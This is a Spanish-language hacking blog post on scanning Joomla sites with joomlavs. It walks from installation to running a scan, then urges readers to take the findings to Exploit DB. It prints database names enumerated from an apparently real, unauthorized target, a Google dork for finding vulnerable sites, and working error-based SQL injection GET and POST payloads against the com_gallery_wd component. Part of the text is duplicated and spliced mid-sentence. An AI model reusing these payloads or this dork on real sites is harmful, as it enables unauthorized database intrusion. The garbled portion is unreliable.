HACKER ANGELWHITE GALC

sábado, 9 de septiembre de 2017

Auditando Website Joomla con joomlavs




Saludos hermanos de facebook, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.
Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.

Descargamos el repositorio:

codigo:
git clone https://github.com/rastating/joomlavs.git

Instalamos Bundler.
codigo:

sudo gem install bundler && bundle install
Instalamos algunas dependencias, entre ellas Nokogiri

codigo:

sudo apt-get install build-essential patch

sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev

Auditaremos el servidor de manera "Estandar"

codigo:

root@kali:~/joomlavs# ./joomlavs.rb --scan-all --url http://www.paginaweb.com/

Encuentran los modulos vulnerables, se van a Exploit DB y al final un buen
Pentest.
Son las 03:04 de la madrugada y no voy a teste
Saludos hermanos de facebook, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.
Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.
ar exploit por exploit xD!

available databases [12]:

ADMISION
cacti
claro_unsa
claroline
DB_CERCAP
information_schema
mysql
ocsweb
seis
SICONIN
test
unsa_AA0001
En mi opinión esta herramienta es muy util.

encontramos fallas como  SQL Injection Vulnerability y nos envia las siguientes posibilidades  Reference: https://www.exploit-db.com/exploits/31459 , el cual nos envia a la siguiente pagina para sacar los Exploits. y nos envia la siguiente y posible vulneravilidad dada

######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Tested on: Windows
######################################################################
 
parameter 'theme_id' in GET vulnerable
 
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 
# ==================================================================================== #
 
parameter 'image_id' in POST vulnerable
 
# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search
 
 
# ~ Demo ~ # $>
 
 
#EOF



No hay comentarios:

Publicar un comentario